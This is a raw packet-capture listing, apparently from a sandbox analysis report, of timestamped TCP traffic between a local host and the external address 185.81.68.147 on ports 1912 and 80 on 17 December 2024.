                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642440081 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642515898 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642597914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642724037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642777920 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642831087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642885923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642963886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.642973900 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643150091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643158913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643306971 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643321991 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643465996 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643474102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643605947 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643608093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643794060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.643804073 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644032955 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644042015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644150972 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644284964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644294024 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644301891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644402981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644412041 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644543886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644552946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644752026 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644771099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644937992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.644946098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645159006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645167112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645214081 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645267010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645374060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645390034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645673037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645755053 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645840883 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645946026 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645965099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.645973921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.646028042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.646087885 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.646586895 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648185015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648195028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648364067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648372889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648442984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648533106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648621082 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648628950 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648762941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648830891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.648998976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649008036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649076939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649108887 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649303913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649312019 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649403095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649471045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649621010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649632931 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649787903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649796009 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649943113 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.649951935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650088072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650130987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650237083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650247097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650299072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650326967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650549889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650558949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650731087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650755882 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650964975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.650974989 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651164055 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651288033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651354074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651456118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651691914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651722908 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651911974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.651921034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724224091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724248886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724617958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724699974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724713087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724723101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.724787951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.725600958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.725615025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.725759983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727127075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727139950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727195978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727219105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727372885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727626085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728167057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728219986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728255987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729096889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729197979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729310036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730046034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730257034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730546951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731096029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731146097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731296062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732006073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732040882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732166052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732892990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732933044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732978106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733839035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733954906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733989954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.734935045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735260963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735280991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735738039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735892057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.736175060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740855932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740885019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740895987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740906000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740936041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740947008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740957975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740968943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740986109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740997076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741277933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741561890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741575003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741740942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.742785931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.743079901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.743995905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744029999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744505882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744587898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744971037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744983912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.745682955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.745727062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746033907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746593952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746604919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746634960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747222900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747236013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747335911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748611927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748866081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748878002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749020100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749259949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749433994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749463081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750488997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750499964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750562906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751076937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751179934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751575947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751918077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752239943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752762079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752993107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.753072023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.753225088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754111052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754122972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754545927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755141973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755153894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755333900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755948067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756047964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756202936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756951094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756963968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.757095098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.757936001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.758014917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.758033037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.758749962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.758761883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.758816957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.759563923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.759685993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.759733915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.760591984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.760603905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.760894060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.761460066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.761588097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.761595011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.762401104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.762412071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.762737036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.763333082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.763350010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.763442993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.764286995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.764358044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.764401913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.765259981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.765316963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.765338898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769315004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769345999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769371033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769378901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769387960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769396067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769404888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769412041 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769421101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769435883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769445896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769459963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769474030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769486904 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769495010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769503117 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769511938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769521952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769531965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769543886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769573927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769573927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.769573927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.770145893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.770158052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.770946026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.770968914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.771071911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.771363020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.772146940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.772160053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.772953987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.772967100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.773967028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.774265051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916035891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916100979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916352987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916434050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916518927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.916872025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.917463064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.917474985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.917561054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.918381929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.918405056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.919275999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.919399023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.919450045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.919903994 CET4970980192.168.2.8185.81.68.147
